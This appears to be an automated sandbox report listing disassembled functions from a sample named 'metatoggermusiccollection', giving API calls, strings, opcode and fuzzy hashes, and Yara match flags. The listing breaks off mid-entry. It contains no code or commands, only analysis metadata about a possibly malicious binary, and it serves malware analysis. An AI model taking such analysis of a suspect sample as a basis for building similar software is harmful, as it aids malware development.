                                                                            Function 02AF02E4 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 02AF02F0
                                                                              • Part of subcall function 02AE2EEC: __FF_MSGBANNER.LIBCMT ref: 02AE2F03
                                                                              • Part of subcall function 02AE2EEC: __NMSG_WRITE.LIBCMT ref: 02AE2F0A
                                                                              • Part of subcall function 02AE2EEC: RtlAllocateHeap.NTDLL(00780000,00000000,00000001), ref: 02AE2F2F
                                                                            • _free.LIBCMT ref: 02AF0303
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap_free_malloc
                                                                            • String ID:
                                                                            • API String ID: 1020059152-0
                                                                            • Opcode ID: f4785279610af9499d609b2e5788f05b0bfaadd12db9620b82c301c89bf8f483
                                                                            • Instruction ID: 29e55d389809ab93118dcb02d023796e4a7d04359dd97b2175aa6927674b8a9e
                                                                            • Opcode Fuzzy Hash: f4785279610af9499d609b2e5788f05b0bfaadd12db9620b82c301c89bf8f483
                                                                            • Instruction Fuzzy Hash: 9411EB32D88311ABDF612FF0BD8875A37999F00364F000A55FB068B155EF38C451CA90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD21D5 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD21DA
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02AD21ED
                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02AD2224
                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02AD2237
                                                                            • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02AD2261
                                                                              • Part of subcall function 02AD2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02AD2350
                                                                              • Part of subcall function 02AD2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02AD2360
                                                                              • Part of subcall function 02AD2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02AD2370
                                                                              • Part of subcall function 02AD2341: GetLastError.KERNEL32 ref: 02AD237A
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 1856819132-0
                                                                            • Opcode ID: ff08506bc12073621df0e42cd1311d0c4a883ad8911627e6f37035c6cee60ec6
                                                                            • Instruction ID: f0b96cf6c7c901f944c3787d63c0d260d6f265e876ed9fa655ac1867189edbad
                                                                            • Opcode Fuzzy Hash: ff08506bc12073621df0e42cd1311d0c4a883ad8911627e6f37035c6cee60ec6
                                                                            • Instruction Fuzzy Hash: 2D117F71D44118DBCB01AFA4DD44BAEFBBAFF58310F00455AF916A3261DF758662DB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD2298 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD229D
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02AD22B0
                                                                            • TlsGetValue.KERNEL32 ref: 02AD22E7
                                                                            • TlsSetValue.KERNEL32(?), ref: 02AD2300
                                                                            • TlsSetValue.KERNEL32(?,?,?), ref: 02AD231C
                                                                              • Part of subcall function 02AD2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02AD2350
                                                                              • Part of subcall function 02AD2341: InterlockedExchange.KERNEL32(?,00000001), ref: 02AD2360
                                                                              • Part of subcall function 02AD2341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02AD2370
                                                                              • Part of subcall function 02AD2341: GetLastError.KERNEL32 ref: 02AD237A
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 1856819132-0
                                                                            • Opcode ID: 3f8467ec4e6aea73df4e3dd57e461a1fbd96747e079e41b8c7cb61df6a3c3b9c
                                                                            • Instruction ID: 986974569216f3ad5edcd652fc1b85b4a96192d5d914c31006541f1bf2d3eb27
                                                                            • Opcode Fuzzy Hash: 3f8467ec4e6aea73df4e3dd57e461a1fbd96747e079e41b8c7cb61df6a3c3b9c
                                                                            • Instruction Fuzzy Hash: DF115EB1D40218DBCB02AFA5DD44AAEFFBAFF58310F00455AE805A3210DF759A62DF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADBC45 Relevance: 7.5, APIs: 5, Instructions: 45synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 02ADB098: __EH_prolog.LIBCMT ref: 02ADB09D
                                                                            • __CxxThrowException@8.LIBCMT ref: 02ADBC62
                                                                              • Part of subcall function 02AE449A: RaiseException.KERNEL32(?,?,02ADFA92,?,?,?,?,?,?,?,02ADFA92,?,02B00F78,?), ref: 02AE44EF
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02B01D94,?,00000001), ref: 02ADBC78
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02ADBC8B
                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02B01D94,?,00000001), ref: 02ADBC9B
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02ADBCA9
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                            • String ID:
                                                                            • API String ID: 2725315915-0
                                                                            • Opcode ID: ee268003ce00d6d7c3effeaee33bea4428fa9550b28ff7b2e36935843922e2eb
                                                                            • Instruction ID: fd8ef4d988aae6c09c1bc835ecd03c1d7c26ae913433aece52903fe9d209a271
                                                                            • Opcode Fuzzy Hash: ee268003ce00d6d7c3effeaee33bea4428fa9550b28ff7b2e36935843922e2eb
                                                                            • Instruction Fuzzy Hash: 9D016DB2A40305AFDB109FE4DC89E86B7ADEF0835AF004914F626D6690DF64E8168B20
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD2420 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02AD2432
                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02AD2445
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02AD2454
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02AD2469
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02AD2470
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 747265849-0
                                                                            • Opcode ID: 5ca50511c0f5fcfd653729c39180204911c50e651ef054acaf5ae56ca45b2f07
                                                                            • Instruction ID: 496fef5fad7a3555cb044a5d73fd2a139e57da00608866500009da5ed2a39f3a
                                                                            • Opcode Fuzzy Hash: 5ca50511c0f5fcfd653729c39180204911c50e651ef054acaf5ae56ca45b2f07
                                                                            • Instruction Fuzzy Hash: B5F01D72680214BBD6509FA4ED89FD6B72CFF45711F804411FB02D6881DBA5F921CBA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD1EC7 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedIncrement.KERNEL32(?), ref: 02AD1ED2
                                                                            • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02AD1EEA
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02AD1EF9
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02AD1F0E
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02AD1F15
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 830998967-0
                                                                            • Opcode ID: 75626f04c9278d0aab3fee51f646c33c7785d06b926050be0bfde01aaf4d3ee4
                                                                            • Instruction ID: aa21b5d9ba77cbb965080ea03ea8039c9fa48422f0d20753fd1809e1bc741702
                                                                            • Opcode Fuzzy Hash: 75626f04c9278d0aab3fee51f646c33c7785d06b926050be0bfde01aaf4d3ee4
                                                                            • Instruction Fuzzy Hash: 24F01772641605BBD740AFA5ED88FD6BB2DFF04351F000416F70286841DB79EA66CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD8682 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: invalid string position$string too long
                                                                            • API String ID: 4104443479-4289949731
                                                                            • Opcode ID: e96c415cf68514eaac9a74eddb5ed953261e0d1a17194f1af6555beac26eb95b
                                                                            • Instruction ID: 8d3deb3e9d3a98881198a6bd696067f0d8351ea21a847bb66e0dee0c937cf1bc
                                                                            • Opcode Fuzzy Hash: e96c415cf68514eaac9a74eddb5ed953261e0d1a17194f1af6555beac26eb95b
                                                                            • Instruction Fuzzy Hash: 9141A075300305EFDB248F69D984A6ABBBAEB40724B00092DE957CB781CF74E946CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD30AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000), ref: 02AD30C3
                                                                            • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02AD3102
                                                                            • _memcmp.LIBCMT ref: 02AD3141
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressErrorLastString_memcmp
                                                                            • String ID: 255.255.255.255
                                                                            • API String ID: 1618111833-2422070025
                                                                            • Opcode ID: 15410e691c6e40227df30714182f22504e484f20822fc166d137748688c54283
                                                                            • Instruction ID: fbba9c64462400144da98d791c0e7fcc6106f098d130052ea5d26348417cb32c
                                                                            • Opcode Fuzzy Hash: 15410e691c6e40227df30714182f22504e484f20822fc166d137748688c54283
                                                                            • Instruction Fuzzy Hash: 693197B1900309DFDF209FA4C88076EB7B5BF45314F1045A9E96797280DF71994ACF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD1F56 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD1F5B
                                                                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02AD1FC5
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 02AD1FD2
                                                                              • Part of subcall function 02AD1712: __EH_prolog.LIBCMT ref: 02AD1717
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                            • String ID: iocp
                                                                            • API String ID: 998023749-976528080
                                                                            • Opcode ID: dac0d0ab76a7bb68afe6c29b896c0a7a8f48fb1d2cdfc158fe227510872d3e2a
                                                                            • Instruction ID: 3526be533e4d001ccaa5126d49d78c2099123b0309a920952b9a3ae54fdfa16c
                                                                            • Opcode Fuzzy Hash: dac0d0ab76a7bb68afe6c29b896c0a7a8f48fb1d2cdfc158fe227510872d3e2a
                                                                            • Instruction Fuzzy Hash: 1821D5B1901B449BC720DFAAC54055BFBF8FF94720B108A1FE5A683A60DBB4A604CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AE3A8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 02AE3AA7
                                                                              • Part of subcall function 02AE2EEC: __FF_MSGBANNER.LIBCMT ref: 02AE2F03
                                                                              • Part of subcall function 02AE2EEC: __NMSG_WRITE.LIBCMT ref: 02AE2F0A
                                                                              • Part of subcall function 02AE2EEC: RtlAllocateHeap.NTDLL(00780000,00000000,00000001), ref: 02AE2F2F
                                                                            • std::exception::exception.LIBCMT ref: 02AE3AC5
                                                                            • __CxxThrowException@8.LIBCMT ref: 02AE3ADA
                                                                              • Part of subcall function 02AE449A: RaiseException.KERNEL32(?,?,02ADFA92,?,?,?,?,?,?,?,02ADFA92,?,02B00F78,?), ref: 02AE44EF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                            • String ID: bad allocation
                                                                            • API String ID: 3074076210-2104205924
                                                                            • Opcode ID: 30394fa328bd6f580bcc75459a57ba0aa20b398514090673ac76f86a678a574a
                                                                            • Instruction ID: 689ff58387c03f117c7260b43c154a40059f5aedd23c361a1059cd4881ef7b22
                                                                            • Opcode Fuzzy Hash: 30394fa328bd6f580bcc75459a57ba0aa20b398514090673ac76f86a678a574a
                                                                            • Instruction Fuzzy Hash: DBE0E53054020EAADF00FFA0CD04ABFBB7DAF00304F4004D5AD1663590EF369646D990
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD37B1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD37B6
                                                                            • __localtime64.LIBCMT ref: 02AD37C1
                                                                              • Part of subcall function 02AE2540: __gmtime64_s.LIBCMT ref: 02AE2553
                                                                            • std::exception::exception.LIBCMT ref: 02AD37D9
                                                                              • Part of subcall function 02AE2413: std::exception::_Copy_str.LIBCMT ref: 02AE242C
                                                                              • Part of subcall function 02ADA45B: __EH_prolog.LIBCMT ref: 02ADA460
                                                                              • Part of subcall function 02ADA45B: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02ADA46F
                                                                              • Part of subcall function 02ADA45B: __CxxThrowException@8.LIBCMT ref: 02ADA48E
                                                                            Strings
                                                                            • could not convert calendar time to UTC time, xrefs: 02AD37CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                            • String ID: could not convert calendar time to UTC time
                                                                            • API String ID: 1963798777-2088861013
                                                                            • Opcode ID: 6f47661def6610d5a2134b33928a83614d0ebb2dc4adb0de2b4fa4050180ad6d
                                                                            • Instruction ID: 9ec15a7f7941968e74b2dcf2a0cc8a6ee09e9291897cc1054cc9039057f87745
                                                                            • Opcode Fuzzy Hash: 6f47661def6610d5a2134b33928a83614d0ebb2dc4adb0de2b4fa4050180ad6d
                                                                            • Instruction Fuzzy Hash: 24E06DB1D8060A9ACF00EFD4DA547AEB779EF04300F4045A9E916A2540EF38560A8E95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403B08 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032A0), ref: 00403B29
                                                                            • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032A0), ref: 00403B4D
                                                                            • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032A0), ref: 00403B67
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032A0), ref: 00403C28
                                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032A0), ref: 00403C3F
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual$FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 714016831-0
                                                                            • Opcode ID: 2f654d351822ba0938a426815c3a9789615761df562ee039fb8b9cb046954d4c
                                                                            • Instruction ID: 29c7c306398b504596bf767bafbbf3f0594b5aced9f79ae4ff8fd419923c464c
                                                                            • Opcode Fuzzy Hash: 2f654d351822ba0938a426815c3a9789615761df562ee039fb8b9cb046954d4c
                                                                            • Instruction Fuzzy Hash: 6831F071A447019BE3208F24DD45B22BFB8EB44B5AF10813AE566BB3D1E778B9008B5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AEC329 Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AdjustPointer_memmove
                                                                            • String ID:
                                                                            • API String ID: 1721217611-0
                                                                            • Opcode ID: 24d65704ef255113032d1efe3de204f8ae5ad15449ebce515c6bff1890b59871
                                                                            • Instruction ID: 68c94dd4822037b06924c46f6f545e3a02b97310ff1dfda3cf721a1cb96bbe07
                                                                            • Opcode Fuzzy Hash: 24d65704ef255113032d1efe3de204f8ae5ad15449ebce515c6bff1890b59871
                                                                            • Instruction Fuzzy Hash: 2141A0762443439AEF289F64D884F7A73A79F01334F24441FE94B8A1E1EF65E982CA11
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AE1260 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02AD4149), ref: 02AE12FF
                                                                              • Part of subcall function 02AD3FDC: __EH_prolog.LIBCMT ref: 02AD3FE1
                                                                              • Part of subcall function 02AD3FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02AD3FF3
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02AE12F4
                                                                            • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02AD4149), ref: 02AE1340
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02AD4149), ref: 02AE1411
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$Event$CreateH_prolog
                                                                            • String ID:
                                                                            • API String ID: 2825413587-0
                                                                            • Opcode ID: ee3d694d157bd3230508e8040fbecc7cd47dc3bd46f7e3484b47b313321f578c
                                                                            • Instruction ID: 87f6b907ec00bc7c0dbf6a59d509625cb09d64e27cd151a254e15f5be78f40fd
                                                                            • Opcode Fuzzy Hash: ee3d694d157bd3230508e8040fbecc7cd47dc3bd46f7e3484b47b313321f578c
                                                                            • Instruction Fuzzy Hash: 1951AEB16003168BDF11DF28C884B9AB7E5AF48328F150668E86E97390DF35DC06CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AE36F0 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                            • String ID:
                                                                            • API String ID: 2782032738-0
                                                                            • Opcode ID: 4b00bb2f2e8909ad1b25914f564552747ffa73792e7b52f6c639d3ed484d2925
                                                                            • Instruction ID: 77b72f3c8ba06149445a9c60bcaa0fb4642eb414219ac411a74824b41e73b4bc
                                                                            • Opcode Fuzzy Hash: 4b00bb2f2e8909ad1b25914f564552747ffa73792e7b52f6c639d3ed484d2925
                                                                            • Instruction Fuzzy Hash: F941A0B5A00706EBDF18CF69C8D15BE77A6AF44364B1482ADE85787280EF71D942CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AEFE55 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02AEFE8B
                                                                            • __isleadbyte_l.LIBCMT ref: 02AEFEB9
                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 02AEFEE7
                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 02AEFF1D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            • Opcode ID: 1a789f2ccdc93dc6182c2e667dd4843a07b9bc4794680ace066e4e8366a2a11f
                                                                            • Instruction ID: 17fb67cc1d663ffb52ec3b55068d25ddfa106b4c5d8d0cc6e5050b75cb820993
                                                                            • Opcode Fuzzy Hash: 1a789f2ccdc93dc6182c2e667dd4843a07b9bc4794680ace066e4e8366a2a11f
                                                                            • Instruction Fuzzy Hash: 0931E131600246AFDF219F79CC84BAA7BB9FF41314F154069E81AC79A1EB30E852CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD3D7E Relevance: 6.1, APIs: 4, Instructions: 57networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • htons.WS2_32(?), ref: 02AD3DA2
                                                                              • Part of subcall function 02AD3BD3: __EH_prolog.LIBCMT ref: 02AD3BD8
                                                                              • Part of subcall function 02AD3BD3: std::bad_exception::bad_exception.LIBCMT ref: 02AD3BED
                                                                            • htonl.WS2_32(00000000), ref: 02AD3DB9
                                                                            • htonl.WS2_32(00000000), ref: 02AD3DC0
                                                                            • htons.WS2_32(?), ref: 02AD3DD4
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                            • String ID:
                                                                            • API String ID: 3882411702-0
                                                                            • Opcode ID: 8c0e368111d66e22b224f9197cd6ccfbdeda42b62df203bf08661ba22a66af6e
                                                                            • Instruction ID: 233b316df086e187e98ab655d168c96c75c61ecdef6a7662ba9ef4efcf62983b
                                                                            • Opcode Fuzzy Hash: 8c0e368111d66e22b224f9197cd6ccfbdeda42b62df203bf08661ba22a66af6e
                                                                            • Instruction Fuzzy Hash: 37118235900309EFCF019FA4D985AAAB7B9EF09310F008496FD05DF215EA71DA19CBA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD239D Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02AD23D0
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02AD23DE
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02AD2401
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02AD2408
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 4018804020-0
                                                                            • Opcode ID: 5193d626149907782b5a0f603a3712dbb9e070923ed9fdf51b16a94f5bdbd036
                                                                            • Instruction ID: fa928e1101214d55937d0f983a2abf6bf587ca7e1eaa0965730ad9abe3029def
                                                                            • Opcode Fuzzy Hash: 5193d626149907782b5a0f603a3712dbb9e070923ed9fdf51b16a94f5bdbd036
                                                                            • Instruction Fuzzy Hash: 6E11CE71600304ABDB109FA0CD84BA6BBB9FF40704F1044ADEA029B541EBB5F912CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AEC77B Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
